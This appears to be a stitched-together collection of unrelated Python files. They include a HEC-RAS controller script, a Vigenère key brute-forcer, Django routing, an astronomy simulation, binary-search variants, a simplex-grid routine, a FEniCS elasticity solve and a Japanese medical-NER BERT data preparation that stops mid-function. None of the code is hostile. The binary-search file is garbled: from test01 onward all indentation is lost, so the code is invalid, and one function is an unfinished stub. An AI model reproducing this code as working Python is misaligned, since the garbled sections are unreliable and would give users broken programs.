#print('PlotStageFlow')
#print('')
#rc.PlotStageFlow_SA(sa)
#print('PlotStageFlow_SA')
#print('')
#rc.PlotXS(riv, rch, rs)
#print('PlotXS')
#print('')
#rc.PlotXYZ(riv, rch)
#print('PlotXYZ')
#print('')
# %% Project (Controller Class)
#res = rc.Project_Current()
#print('Project_Current:')
#print(res)
#print('')
#title = 'Test'
#path = r'd:\test\file.prj'
#rc.Project_New(title, path)
#print('Project_New:')
#print('')
#path = r'd:\test1\copy.prj'
#rc.Project_SaveAs(path)
#print('Project_SaveAs:')
#print('')
#rc.Compute_HideComputationWindow()
#rc.Compute_ShowComputationWindow()
#res = rc.Compute_CurrentPlan()
#print('Compute_CurrentPlan:')
#print(res)
#print('')
#res = rc.Compute_Cancel()
#print('\nCompute_Cancel', res)
#res = rc.Compute_Complete()
#print('Compute_Complete')
#print(res)
#print('')
# %% Schematic (Controller Class)
#res = rc.Schematic_ReachCount()
#print('Schematic_ReachCount')
#print(res)
#print('')
#
#res = rc.Schematic_ReachPointCount()
#print('Schematic_ReachPointCount')
#print(res)
#print('')
#
#res = rc.Schematic_ReachPoints()
#print('Schematic_ReachPoints')
#print(res)
#print('')
#
#res = rc.Schematic_XSCount()
#print('Schematic_XSCount')
#print(res)
#print('')
#
#res = rc.Schematic_XSPointCount()
#print('Schematic_XSPointCount')
#print(res)
#print('')
#
#res = rc.Schematic_XSPoints()
#print('Schematic_XSPointCount')
#print(res)
#print('')
# %% Steady
#project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
#rc = RAS500()
#rc.ShowRas()
#rc.Project_Open(project)
#res = rc.SteadyFlow_ClearFlowData()
#print('SteadyFlow_ClearFlowData')
#river = 'Beaver Creek'
#reach = 'Kentwood'
#downstream = True
#ws = [210,211, 215]
#res = rc.SteadyFlow_FixedWSBoundary(river, reach, downstream , ws)
#print('SteadyFlow_FixedWSBoundary')
#res = rc.SteadyFlow_nProfile()
#print('SteadyFlow_nProfile', res)
#river = 'Beaver Creek'
#reach = 'Kentwood'
#rs = '5.99'
#flow = [5001, 10001, 14001]
#res = rc.SteadyFlow_SetFlow(river, reach, rs, flow)
#print('SteadyFlow_SetFlow', res)
# %% Table
# Open the steady-flow example project in HEC-RAS 5.0.0 via the COM controller.
project = r'D:\Users\penac1\Dropbox (Personal)\it\repos\git\pyras\temp_examples\Steady Examples\BEAVCREK.prj'
rc = RAS500()
rc.ShowRas()  # make the HEC-RAS window visible
rc.Project_Open(project)
#river = 'Beaver Creek'
#reach = 'Kentwood'
#rc.TablePF(river, reach)
#print('TablePF')
# Show the cross-section table for one station, then shut HEC-RAS down.
river = 'Beaver Creek'
reach = 'Kentwood'
rs = '5.99'
rc.TableXS(river, reach, rs)
print('TableXS')
time.sleep(3)  # leave the table on screen briefly before closing
rc.close()
kill_ras()  # presumably terminates leftover HEC-RAS processes - confirm
|
import itertools
import string
import enchant
import sys
if len(sys.argv) >= 3:
    # Two ciphertext files are required; the original tested >= 2 but then
    # read sys.argv[2], crashing with IndexError when only one was given.
    # string.uppercase is Python-2-only; ascii_uppercase works on both.
    alphabets = [string.ascii_uppercase] * 6
    d = enchant.Dict("en_US")
    # Read the first six cipher letters from each file; with-blocks close
    # the handles (the original leaked both by rebinding file1/file2).
    with open(sys.argv[1], 'r') as fh:
        cipher1 = fh.read(6)
    with open(sys.argv[2], 'r') as fh:
        cipher2 = fh.read(6)
    # Brute-force every 6-letter key.
    for a in itertools.product(*alphabets):
        # Vigenere decryption: plain = (cipher - key) mod 26, mapped to A-Z.
        scheck1 = ''.join(chr(((ord(cipher1[n]) - ord(a[n])) % 26) + 65) for n in range(6))
        scheck2 = ''.join(chr(((ord(cipher2[n]) - ord(a[n])) % 26) + 65) for n in range(6))
        # Test progressively shorter prefixes (lengths 6 down to 2)
        # against the English dictionary.
        for n in range(5):
            if d.check(scheck1):
                print("----------file1-------------\nKey: " + ''.join(a) + " Output: " + scheck1 + "\n----------------------------\n")
            if d.check(scheck2):
                print("----------file2-------------\nKey: " + ''.join(a) + " Output: " + scheck2 + "\n----------------------------\n")
            scheck1 = scheck1[:-1]
            scheck2 = scheck2[:-1]
else:
    print('Usage: ' + sys.argv[0] + ' file1 file2')
|
from django.apps import AppConfig
class ViewsetUrlRouteConfig(AppConfig):
    """Django application configuration for the Viewset_url_route app."""
    # Dotted module path Django uses to locate this application.
    name = 'Viewset_url_route'
|
from synthetic_galaxy import synthetic_galaxy
from error_with_jitter import error_with_jitter
from machine_error import machine_error
from binary_fraction import binary_fraction
def synthetic_fractions(num_of_galaxies, cloud, bf, m_min, mu, sigma, a, b):
    """Make a list of detection rates from synthetic simulated galaxies.

    Inputs
    ----------
    num_of_galaxies: How many synthetic galaxies you want to make
    cloud: Astropy table object. The table is used as a basis for making the synthetic galaxies. Should
        have been made through the DataSimp process.
    bf: Desired binary fraction that you want in the synthetic galaxy. Should be a number between [0,1]
    m_min: Minimum mass you want to consider for a secondary object. Needs to have astropy units
        of Jupiter masses (original said ".JupyterMass" - presumably astropy's jupiterMass; TODO confirm)
    mu: Mean value used in making the period distribution for binary orbits
    sigma: Standard deviation for the period distribution for the binary orbits
    a: Jitter parameter, y-intercept for the line in log space
    b: Jitter parameter, slope for the line in log space.

    Output
    ----------
    syn_fractions: List of detection rates for each synthetic galaxy made. Has len = num_of_galaxies
    """
    # Accumulates one detection rate per simulated galaxy.
    syn_fractions = []
    # for-over-range replaces the original manual while-loop counter.
    for _ in range(num_of_galaxies):
        # Synthetic radial-velocity and error observations for one galaxy.
        rv_syn, err_syn = synthetic_galaxy(cloud, bf, m_min, mu, sigma)
        # Inflate the errors with the jitter model (line a + b*x in log space).
        err_syn_j = error_with_jitter(err_syn, a, b, cloud['LOGG'])
        # Perturb the exact velocities by the jittered errors.
        rv_syn_j = machine_error(rv_syn, err_syn_j)
        # Detection rate for this synthetic galaxy.
        syn_fractions.append(binary_fraction(rv_syn_j, err_syn_j))
    return syn_fractions
|
from image_processing import ImageProcessing
import numpy as np
import os
import utils
img_prc = ImageProcessing()
wally_testdir = './wally_raspCam'
# Crop every image under the test directory; the numeric arguments are
# presumably tile size (24x24) and stride (48x48) - TODO confirm against
# generate_cropped_imgs' signature.
imgs_coords = img_prc.generate_cropped_imgs(wally_testdir, 24, 24, 48, 48)
# Persist the cropped tiles next to the source images, one .npy per .jpg.
# Iterate items() instead of re-indexing the mapping by key; the
# coordinates half of each value is unused here.
for key, (imgs, _coords) in imgs_coords.items():
    np.save(file=os.path.join(wally_testdir, key.replace('.jpg', '.npy')), arr=imgs)
|
def binary_search_1(alist, item):
    """Recursive binary search: True iff item occurs in the sorted list."""
    if not alist:
        return False
    mid = len(alist) // 2
    pivot = alist[mid]
    if pivot == item:
        return True
    if item < pivot:
        return binary_search_1(alist[:mid], item)
    return binary_search_1(alist[mid + 1:], item)
def binary_search_2(alist, item):
    """Iterative binary search: index of item in the sorted list, or -1."""
    lo, hi = 0, len(alist) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        value = alist[mid]
        if value == item:
            return mid
        if item < value:
            hi = mid - 1
        else:
            lo = mid + 1
    return -1
def array_binary_search(nums,target):
    # NOTE(review): unfinished stub - find_idx computes a midpoint and reads
    # the value there but never loops, compares against target, or returns,
    # and the outer function never calls it, so this always returns None.
    # The commented-out rotation check suggests it was meant to search a
    # rotated sorted array (test03 below is a completed version) - confirm.
    def find_idx(l,r):
        # Midpoint written as l + (r - l) // 2 to avoid index-sum bias.
        mid = (r - l) // 2 + l
        tmp = nums[mid]
        # if nums[l]>nums[r]:
# 二分搜索变形之:查找升序数组中target第一次出现和最后一次出现时的索引位置
def test01(nums,target):
def search_lower_bound(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l +( r-l) // 2
if alist[mid] == item and (mid==0 or alist[mid-1]<item):
return mid
elif alist[mid] >= item:
r = mid - 1
else:
l = mid + 1
return -1
def search_upper_bound(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l + (r - l) // 2
if alist[mid] == item and (mid==len(alist)-1 or alist[mid+1]>item):
return mid
elif alist[mid] <= item:
l = mid + 1
else:
r = mid - 1
return -1
a = search_lower_bound(nums,target)
b = search_upper_bound(nums,target)
return [a,b]
# 二分搜索变形之:查找第一个大于target的位置
def test02(nums,target):
def search_one(alist, item):
l = 0
r = len(alist) - 1
while l <= r:
mid = l +( r-l) // 2
if alist[mid] > item and (mid==0 or alist[mid-1]<=item):
return mid
elif alist[mid] < item:
l = mid + 1
elif alist[mid] > item:
r = mid - 1
elif alist[mid] == item:
l = mid + 1
return -1
return search_one(nums,target)
# 二分搜索变形之:查找target在升序变形数组中的位置
def test03(nums,target):
def search_one(nums, target):
l = 0
r = len(nums) - 1
while l <= r:
mid = l +(r-l) // 2
if nums[mid] == target:
return mid
if nums[mid] >= nums[l]:
if nums[mid]>target>=nums[l]:
r = mid -1
else:
l = mid + 1
else:
if nums[mid]<target<=nums[r]:
l = mid + 1
else:
r = mid - 1
return -1
return search_one(nums,target)
if __name__ == '__main__':
    # Rotated ascending array; 3 sits at index 5, so this prints 5.
    data = [65, 78, 98, 1, 2, 3, 6]
    print(test03(data, 3))
#! /usr/bin/env python
#
def simplex_grid_index_next ( m, n, g ):

#*****************************************************************************80
#
## SIMPLEX_GRID_INDEX_NEXT returns the next simplex grid index.
#
#  Discussion:
#
#    The vector G has dimension M+1.  The first M entries may be regarded
#    as grid coordinates.  These coordinates must have a sum between 0 and N.
#    The M+1 entry contains the remainder, that is N minus the sum of the
#    first M coordinates.
#
#    Each time the function is called, it is given a current grid index, and
#    computes the next one.  The very first index is all zero except for a
#    final value of N, and the very last index has all zero except for an'
#    intial value of N.
#
#    For example, here are the coordinates in order for M = 3, N = 3:
#
#     0  0 0 0 3
#     1  0 0 1 2
#     2  0 0 2 1
#     3  0 0 3 0
#     4  0 1 0 2
#     5  0 1 1 1
#     6  0 1 2 0
#     7  0 2 0 1
#     8  0 2 1 0
#     9  0 3 0 0
#    10  1 0 0 2
#    11  1 0 1 1
#    12  1 0 2 0
#    13  1 1 0 1
#    14  1 1 1 0
#    15  1 2 0 0
#    16  2 0 0 1
#    17  2 0 1 0
#    18  2 1 0 0
#    19  3 0 0 0
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    21 April 2015
#
#  Author:
#
#    John Burkardt
#
#  Parameters:
#
#    Input, integer M, the spatial dimension.
#
#    Input, integer N, the number of subintervals.
#
#    Input/output, integer G(M+1), the current, and then the next, grid index.
#
  from comp_next_grlex import comp_next_grlex
  # The simplex index sequence is exactly graded-lexicographic order on the
  # (M+1)-vector of coordinates-plus-remainder, so delegate to COMP_NEXT_GRLEX.
  g = comp_next_grlex ( m + 1, g )
  return g
def simplex_grid_index_next_test ( ):

#*****************************************************************************80
#
## SIMPLEX_GRID_INDEX_NEXT_TEST tests SIMPLEX_GRID_INDEX_NEXT.
#
#  Licensing:
#
#    This code is distributed under the GNU LGPL license.
#
#  Modified:
#
#    21 April 2015
#
#  Author:
#
#    John Burkardt
#
  import numpy as np
  # NOTE: this file is Python 2 throughout (print statements, including the
  # trailing-comma form used below to stay on one output line).
  print ''
  print 'SIMPLEX_GRID_INDEX_NEXT_TEST:'
  print '  SIMPLEX_GRID_INDEX_NEXT lists, one by one, the indices'
  print '  of a simplex grid that uses N+1 points on a side,'
  print '  in an M-dimensional simplex.'
  print ''
  print '   #:  1  2  3  (*)'
  print ''
  m = 3
  n = 3
  j = 0
  # Starting index: all zeros with the full remainder N in the last slot.
  g = np.zeros ( m + 1 )
  g[m] = n
  while ( True ):
    print '  %2d:' % ( j ),
    for i in range ( 0, m ):
      print ' %2d' % ( g[i] ),
    print ' (%2d)' % ( g[m] )
    # The sequence terminates when all of N has moved to the first slot.
    if ( g[0] == n ):
      break
    g = simplex_grid_index_next ( m, n, g )
    j = j + 1
#
#  Terminate.
#
  print ''
  print 'SIMPLEX_GRID_INDEX_NEXT_TEST:'
  print '  Normal end of execution.'
  return
if ( __name__ == '__main__' ):
  # Run the self-test, bracketed by timestamps (timestamp is a sibling
  # module in the same Burkardt collection).
  from timestamp import timestamp
  timestamp ( )
  simplex_grid_index_next_test ( )
  timestamp ( )
|
from rest_framework import routers
from .views import CardsViewSet
router = routers.SimpleRouter()
# Register the cards viewset at the router root; the basename is derived
# from the viewset's queryset (assumes CardsViewSet defines one - TODO confirm).
router.register('', CardsViewSet)
# Expose the generated routes as this module's urlpatterns.
urlpatterns = router.urls
|
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.base import RedirectView
from . import views
# Namespace for reversing URLs, e.g. reverse('campaign:detail').
app_name = 'campaign'
# Route table for the campaign app. Most routes address an object by its
# <name> slug; order matters because several prefixes overlap.
urlpatterns = [
    # Listing, lookup, and import/export of campaign data.
    path('', views.list_bookmarks, name='list_bookmarks'),
    path('thing/<name>', views.detail, name='detail'),
    path('search', views.search, name='search'),
    path('export', views.export, name='export'),
    path('import', views.import_campaign, name='import'),
    path('import_settings', views.import_settings, name='import_settings'),
    path('export_settings', views.export_settings, name='export_settings'),
    path('list/<thing_type>', views.list_all, name='list'),
    # Creation, deletion, and field-level editing of things.
    path('new/<thing_type>', views.new_thing, name='new_thing'),
    path('delete/<name>', views.delete_thing, name='delete_thing'),
    path('add_link/<name>', views.add_link, name='add_link'),
    path('edit_encounters/<name>/<type_name>', views.edit_random_encounters, name='edit_encounters'),
    path('edit_description/<name>', views.edit_description, name='edit_description'),
    path('edit_name/<name>', views.edit_name, name='edit_name'),
    path('edit_image/<name>', views.edit_image, name='edit_image'),
    path('randomize_name/<thing_type_name>/<name>', views.randomize_name, name='randomize_name'),
    path('change_campaign/<name>', views.change_campaign, name='change_campaign'),
    path('set_attribute/<name>/<attribute_name>', views.set_attribute, name='set_attribute'),
    path('remove_link/<name>/<link_name>', views.remove_link, name='remove_link'),
    path('change_parent/<thing_type_name>/<name>', views.change_parent, name='change_parent'),
    path('change_thing_type/<name>/<thing_type_name>', views.change_thing_type, name='change_thing_type'),
    # Randomized attribute generation and its configuration.
    path('random/<thing_type>/<attribute>', views.get_random_attribute, name='get_random_attribute'),
    path('random/<thing_type>/<attribute>/<category>', views.get_random_attribute_in_category, name='get_random_attribute_in_category'),
    path('manage/<thing_type>/<attribute>', views.manage_randomizer_options, name='manage_randomizer_options'),
    path('manage/<thing_type>/<attribute>/<category>', views.manage_randomizer_options_for_category, name='manage_randomizer_options_for_category'),
    path('add_random/<name>/<attribute>', views.generate_random_attributes_for_thing, name='add_random'),
    path('ddb/<dndbeyond_type>/refs', views.manage_dndbeyond_refs, name='manage_dndbeyond_refs'),
    path('add_one_random/<name>', views.add_random_attribute_for_thing, name='add_one_random'),
    path('edit_random/<name>/<random_attribute_id>', views.edit_random_attribute_for_thing, name='edit_random'),
    path('delete_random/<name>/<random_attribute_id>', views.delete_random_attribute_for_thing, name='delete_random'),
    path('bookmark/<name>', views.bookmark, name='bookmark'),
    # Object generators and weighted presets.
    path('generate/<name>', views.generate_object, name='generate'),
    path('generate_in_location/<location_name>/<generator_name>', views.generate_object_in_location, name='generate_in_location'),
    path('select_generator/<thing_type>', views.select_object_to_generate, name='select_generator'),
    path('new_generator/<thing_type_name>', views.new_generator_object, name='new_generator'),
    path('manage_generators/<thing_type_name>', views.select_generator_to_edit, name='manage_generators'),
    path('edit_generator/<name>', views.edit_generator_object, name='edit_generator'),
    path('add_preset', views.add_preset, name='add_preset'),
    path('select_preset/<attribute_name>', views.select_preset, name='select_preset'),
    path('manage_preset/<preset_name>/<attribute_name>', views.manage_weights, name='manage_preset'),
    path('favicon.ico', RedirectView.as_view(url='/static/favicon.jpg', permanent=True))
]
|
from dolfin import *
import time
start = time.time()  # wall-clock reference for the runtime report at the end
# Optimization options for the form compiler
parameters["form_compiler"]["cpp_optimize"] = True
# parameters["form_compiler"]["representation"] = "quadrature" # change quadrature to uflacs if there's problem
# parameters["form_compiler"]["quadrature_degree"] = 2
ffc_options = {"optimize": True, \
               "eliminate_zeros": True, \
               "precompute_basis_const": True, \
               "precompute_ip_const": True}
# Create mesh and define function space
# mesh = UnitCubeMesh(40, 20, 20)
p0 = Point(0.0, 0.0, 0.0)
p1 = Point(1.25, 1.0, 1.0)
mesh = BoxMesh(p0, p1, 50, 40, 40) # Number of elements
# P1 vector Lagrange elements for the displacement field.
V = VectorFunctionSpace(mesh, "Lagrange", 1)
# Mark boundary subdomains: the x=0 and x=1.25 faces of the box.
left = CompiledSubDomain("near(x[0], side) && on_boundary", side=0.0)
right = CompiledSubDomain("near(x[0], side) && on_boundary", side=1.25)
# Define Dirichlet boundary (x = 0 or x = 1)
c = Expression(("0.0", "0.0", "0.0"), degree=2)  # left face held fixed
# Right face: rigid rotation by theta about the x-axis (centred at y0, z0),
# scaled by 'scale'.
r = Expression(("scale*0.0",
                "scale*(y0 + (x[1] - y0)*cos(theta) - (x[2] - z0)*sin(theta) - x[1])",
                "scale*(z0 + (x[1] - y0)*sin(theta) + (x[2] - z0)*cos(theta) - x[2])"),
               scale = 0.5, y0 = 0.5, z0 = 0.5, theta = pi/3, degree=2)
bcl = DirichletBC(V, c, left)
bcr = DirichletBC(V, r, right)
bcs = [bcl, bcr]
# Define functions
du = TrialFunction(V)            # Incremental displacement
v = TestFunction(V)              # Test function
u = Function(V)                  # Displacement from previous iteration
B = Constant((0.0, -0.5, 0.0))   # Body force per unit volume
T = Constant((1.0, 0.0, 0.0))    # Traction force on the boundary
# Kinematics
d = u.geometric_dimension()
I = Identity(d)             # Identity tensor
F = I + grad(u)             # Deformation gradient
C = variable(F.T*F)         # Right Cauchy-Green tensor
EE = 0.5 * (C - I)          # Green-Lagrange strain (only used by commented-out post-processing)
# Invariants of deformation tensors
Ic = tr(C)
J = sqrt(det(C))
# J = det(F)
# Elasticity parameters
E, nu = 10**6, 0.3
mu, lmbda = Constant(E/(2*(1 + nu))), Constant(E*nu/((1 + nu)*(1 - 2*nu)))
# Stored strain energy density (compressible neo-Hookean model)
psi = (mu/2)*(Ic - 3) - mu*ln(J) + (lmbda/2)*(ln(J))**2
# Total potential energy
Pi = psi*dx - dot(B, u)*dx - dot(T, u)*ds
# Compute first variation of Pi (directional derivative about u in the direction of v)
# NOTE: F is rebound here - no longer the deformation gradient but the residual form.
F = derivative(Pi, u, v)
# Green-Lagrange strain tensor
S = 2*diff(psi, C) # Second Piola-Kirchhoff stress tensor
# P = dot(F, S)
# Compute Jacobian of F
# NOTE: J is likewise rebound from sqrt(det(C)) to the Jacobian form.
J = derivative(F, u, du)
# Newton solve of the nonlinear problem with a GMRES linear solver.
problem = NonlinearVariationalProblem(F, u, bcs, J)
solver = NonlinearVariationalSolver(problem)
prm = solver.parameters
# prm['newton_solver']['absolute_tolerance'] = 1E-8
# prm['newton_solver']['relative_tolerance'] = 1E-7
# prm['newton_solver']['maximum_iterations'] = 25
# prm['newton_solver']['relaxation_parameter'] = 1.0
prm['newton_solver']['linear_solver'] = 'gmres'
# prm['newton_solver']['linear_solver'] = 'minres'
solver.solve()
# Solve variational problem
# solve(F == 0, u, bcs, J=J, form_compiler_parameters=ffc_options)
# solve(F == 0, u, bcs, J=J, solver_parameters={"linear_solver":"lu"})
# Save solution in VTK format
vtkfile = File("./output/fem/Cuboid_U.pvd")
vtkfile << u
# Project and write stress field to post-processing file
# W = TensorFunctionSpace(mesh, "Discontinuous Lagrange", 0)
# GreenStrain = project(EE, V=W)
# File("Cuboid_E.pvd") << GreenStrain
# W = TensorFunctionSpace(mesh, "Discontinuous Lagrange", 0)
# secondPiola = project(S, V=W)
# File("Cuboid_S.pvd") << secondPiola
# Plot and hold solution
plot(u, mode="displacement", interactive=True)
# Norm diagnostics: assemble L2 and H1-seminorm integrands of u.
L2 = inner(u, u) * dx
H10 = inner(grad(u), grad(u)) * dx
energynorm = sqrt(assemble(psi*dx))  # square root of stored energy, not a true H1 norm
# H1 = inner(F, P) * dx
L2norm = sqrt(assemble(L2))
H10norm = sqrt(assemble(H10))
print("L2 norm = %.10f" % L2norm)
print("H1 norm = %.10f" % sqrt(L2norm**2 + H10norm**2))
print("H10 norm (H1 seminorm) = %.10f" % H10norm)
# NOTE(review): the next line labels the energy norm as "H1 norm".
print("H1 norm = %.10f" % energynorm)
print("L2 norm = %.10f" % norm(u, norm_type="L2"))
print("H1 norm = %.10f" % norm(u, norm_type="H1"))
print("H10 norm = %.10f" % norm(u, norm_type="H10"))
print("Running time = %.3f" % float(time.time()-start))
# u_P1 = project(u, V)
u_nodal_values = u.vector()
u_values = u.compute_vertex_values()
# array_u = u_nodal_values.array()
# Plot solution
plot(u, title='Displacement', mode='displacement')
# Recompute the deformation gradient (F was rebound to the residual above).
F = I + grad(u)
P = mu * F + (lmbda * ln(det(F)) - mu) * inv(F).T  # first Piola-Kirchhoff stress
secondPiola = inv(F) * P
Sdev = secondPiola - (1./3)*tr(secondPiola)*I # deviatoric stress
von_Mises = sqrt(3./2*inner(Sdev, Sdev))
# NOTE: V is rebound here from the vector space to a scalar P1 space.
V = FunctionSpace(mesh, "Lagrange", 1)
W = TensorFunctionSpace(mesh, "Lagrange", 1)
von_Mises = project(von_Mises, V)
Stress = project(secondPiola, W, solver_type='gmres')
plot(von_Mises, title='Stress intensity')
# Compute magnitude of displacement
u_magnitude = sqrt(dot(u, u))
u_magnitude = project(u_magnitude, V)
plot(u_magnitude, 'Displacement magnitude')  # NOTE(review): second positional arg may not be the title - confirm plot() signature
# print('min/max u:',
#       u_magnitude.vector().array().min(),
#       u_magnitude.vector().array().max())
# Save solution to file in VTK format
File('./output/fem/elasticity/displacement.pvd') << u
File('./output/fem/elasticity/von_mises.pvd') << von_Mises
File('./output/fem/elasticity/magnitude.pvd') << u_magnitude
File('./output/fem/elasticity/Stress.pvd') << Stress
# %%
#import os
#os.environ['CUDA_LAUNCH_BLOCKING'] = '1'
#同期用コード
import pandas as pd
import numpy as np
from pyasn1.type.base import SimpleAsn1Type
from transformers import BertJapaneseTokenizer
import re
# %%
from IPython import get_ipython
import random
import glob
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from transformers import BertJapaneseTokenizer, BertForSequenceClassification
import pytorch_lightning as pl
# %%
import codecs
from bs4 import BeautifulSoup
import unicodedata
frequent_tags= ['d', 'a', 'f', 'timex3', 't-test', 't-key', 't-val', 'm-key', 'm-val', 'r', 'cc']# tags to extract
'''属性考慮するタグ'''
# Bare string above is used as a comment: "tags with attributes considered".
frequent_tags_attrs= ['d_', 'd_positive', 'd_suspicious', 'd_negative', 'd_general', 'a_', 'f_', 'c_',\
'timex3_', 'timex3_date', 'timex3_time', 'timex3_duration', 'timex3_set', 'timex3_age', 'timex3_med', 'timex3_misc',\
't-test_', 't-test_executed', 't-test_negated', 't-test_other','t-key_', 't-val_',\
'm-key_executed', 'm-key_negated', 'm-key_other', 'm-val_', 'm-val_negated',\
'r_scheduled', 'r_executed', 'r_negated', 'r_other',\
'cc_scheduled', 'cc_executed', 'cc_negated', 'cc_other']# list of entity labels
'''属性考慮しないタグ'''
# Bare string above: "tags without attributes". NOTE: the next assignment
# deliberately overwrites the list above, selecting the attribute-less
# label set (tag name + '_' only).
frequent_tags_attrs = ['d_', 'a_', 'f_', 'timex3_', 't-test_', 't-key_', 't-val_', 'm-key_', 'm-val_', 'r_', 'cc_']
attributes_keys = ['type', 'certainty', 'state']
# Label ids start at 1 (0 is presumably reserved for "no entity" - confirm).
tags_value = [int(i) for i in range(1, len(frequent_tags_attrs)+1)]
dict_tags = dict(zip(frequent_tags_attrs, tags_value))# for converting a label to its type_id
def entities_from_xml(file_name, attrs = True):# attrs: keep tag attributes in labels; False uses the bare tag name
    """Parse a MedTxt XML file into (articles, entities).

    articles: list of [article_id, full_text] pairs.
    entities: per-article lists of dicts with the entity's surface form,
    character span, numeric type_id, and label string.
    """
    with codecs.open(file_name, "r", "utf-8") as file:
        soup = BeautifulSoup(file, "html.parser")
    for elem_articles in soup.find_all("articles"):# each <articles> element
        entities = []
        articles = []
        for elem in elem_articles.find_all('article'):# each <article> inside it
            entities_article = []
            text_list = []
            pos1 = 0
            pos2 = 0
            for child in elem:# process the article's children one by one
                # (untagged text is also yielded as a child, so positions (pos) stay aligned)
                text = unicodedata.normalize('NFKC', child.string)# normalize
                text = text.replace('。', '.')# unify the full stop to '.', used later for sentence splitting
                pos2 += len(text)# remember the end position
                if child.name in frequent_tags:# for the tracked tags, record surface form, span, and label
                    attr = ""# holds the attribute value, if any
                    if 'type' in child.attrs:# when a 'type' attribute exists
                        attr = child.attrs['type']
                    if 'certainty' in child.attrs:# when a 'certainty' attribute exists
                        attr = child.attrs['certainty']
                    if 'state' in child.attrs:# when a 'state' attribute exists
                        attr = child.attrs['state']
                    if not attrs:# attrs=False drops the attribute from the label
                        attr = ""
                    entities_article.append({'name':text, 'span':[pos1, pos2],\
                        'type_id':dict_tags[str(child.name)+'_'+str(attr)],\
                        'type':str(child.name)+'_'+str(attr)})
                pos1 = pos2# start position of the next entity
                text_list.append(text)
            if elem.name == 'article':
                article_id = elem.attrs['id']
                articles.append([article_id, "".join(text_list)])
            entities.append(entities_article)
    # NOTE(review): articles/entities are (re)initialized per <articles>
    # element, so only the last such element survives, and a file with none
    # would raise NameError here; assumes exactly one <articles> - confirm.
    return articles, entities
# %% Enter the input file name here
articles, entities = entities_from_xml('MedTxt-CR-JA-training.xml', attrs=False)  # True to keep attributes
# %%
articles
# %%
df = pd.read_csv('/home/is/tomohiro-ni/NTICIR16/subtask3/MedTxt-CR-JA-ADE-training.csv')
# %%
df_articles = pd.DataFrame(articles, columns=['articleID', 'text'])
df_articles
# %%
# Check the article IDs and duplicate each document once per matching row in df.
# NOTE(review): i ranges over len(df) but indexes df_articles -- assumes
# len(df_articles) >= len(df); confirm.
k = 0
docList = []
for i in range(len(df)):
    ID1 = df_articles.iat[i, 0]  # ID from the articles frame
    document = df_articles.iat[i,1]
    try:
        while ID1 == df.iat[k, 0]:  # repeat while the IDs match
            docList.append(document)  # duplicate the document
            k += 1
    except IndexError:
        break
# %%
# Function version of the cell above:
# find rows shared between two dataframes and replicate the matching
# data once per shared occurrence.
def concatenate_dup(df1, col1, df2, col2, col_result):
    """Append a 'document' column to df1 by replicating data from df2.

    df1        -- base dataframe (one row per record to annotate)
    df2        -- dataframe holding the data to replicate
    col1, col2 -- positions of the matching key column (e.g. an ID) in df2/df1
    col_result -- position in df2 of the column whose data is replicated
    NOTE(review): the loop reads df2.iat[i, ...] while i ranges over
    len(df1); assumes df2 has enough rows for every distinct key -- confirm.
    """
    k = 0
    duplicatedDataList = []
    for i in range(len(df1)):
        ID1 = df2.iat[i, col1]  # key value from df2
        originalData = df2.iat[i, col_result]
        try:
            while ID1 == df1.iat[k, col2]:  # repeat while the keys match
                duplicatedDataList.append(originalData)  # replicate the data
                k += 1
        except IndexError:
            break
    df3 = pd.DataFrame(duplicatedDataList, columns=['document'])
    return pd.concat([df1, df3], axis=1)
# %%
df_concat = concatenate_dup(df, 0, df_articles, 0, 1)
# %%
# Sanity check: every normalized entity text should be findable in its document.
for i in range(len(df_concat)):
    text = df_concat['text'][i:i+1].to_string(index=False)
    text = unicodedata.normalize('NFKC', text)
    doc = df_concat['document'][i:i+1].to_string(index=False)
    match = re.search(re.escape(text),re.escape(doc))  # escaping makes more matches succeed
    try:
        span1 = max(0, match.start())  # give up on rows where no match is found
    except:
        print(doc)
        print(text)
# %%
df.groupby('ADEval').size()
# %%
# Japanese pretrained BERT model
MODEL_NAME = 'cl-tohoku/bert-base-japanese-whole-word-masking'
tokenizer = BertJapaneseTokenizer.from_pretrained(MODEL_NAME)
def extract_text_from_document(text, document):
    """Return the first occurrence of *text* in *document* together with up
    to 50 characters of context on each side (clipped to document bounds).

    Raises AttributeError when *text* does not occur in *document*.
    """
    hit = re.search(re.escape(text), document)
    start = hit.start() - 50
    stop = hit.end() + 50
    if start < 0:
        start = 0
    if stop > len(document):
        stop = len(document)
    return document[start:stop]
# %%
inputTextList = []  # model input is: context + entity text + tag, in that order
inputLabelList = []
inputEntityTxList = []  # kept for later evaluation
inputtagList = []  # kept for later evaluation
k = 0
for i in range(len(df)):
    ID1 = df_articles.iat[i, 0]
    document = df_articles.iat[i,1]
    try:
        while ID1 == df.iat[k, 0]:
            text = unicodedata.normalize('NFKC', df.iat[k,2])  # entity text from df
            tag = df.iat[k,1]  # tag
            label = df.iat[k,4]
            try:
                inputTextList.append\
                    (extract_text_from_document(text, document))
                inputLabelList.append(label)
                inputEntityTxList.append(text)
                inputtagList.append(tag)
            except AttributeError:  # skip rows whose text cannot be matched
                print(document)
                print(text)
            k += 1
    except IndexError:
        break
# %%
# Check the label counts
pd.DataFrame(inputLabelList, columns=['label']).groupby('label').size()
# %%
# 6-4
tokenizer = BertJapaneseTokenizer.from_pretrained(MODEL_NAME)
bert_sc = BertForSequenceClassification.from_pretrained(
    MODEL_NAME, num_labels=4
)
bert_sc = bert_sc.cuda()
# %%
# Build the dataset as a list of [text, label, entity_text, tag] rows
datasetList = list(map(list, (zip(*[inputTextList, inputLabelList, inputEntityTxList, inputtagList]))))
# %%
random.seed(42)
random.shuffle(datasetList) # shuffle randomly
n = len(datasetList)
n_train = int(0.8*n)
n_val = int(0.1*n)
dataset_trainList = datasetList[:n_train] # training data
dataset_valList = datasetList[n_train:n_train+n_val] # validation data
dataset_testList = datasetList[n_train+n_val:] # test data
# %%
# Convert each row into model-ready encodings
def dataset_for_loader(datasetList):
    """Tokenize [context, label, entity_text, tag] rows into BERT encodings.

    Each item becomes a dict of tensors (input_ids, token_type_ids,
    attention_mask, labels) suitable for a DataLoader.
    Uses the module-level `tokenizer`.
    """
    max_length = 128
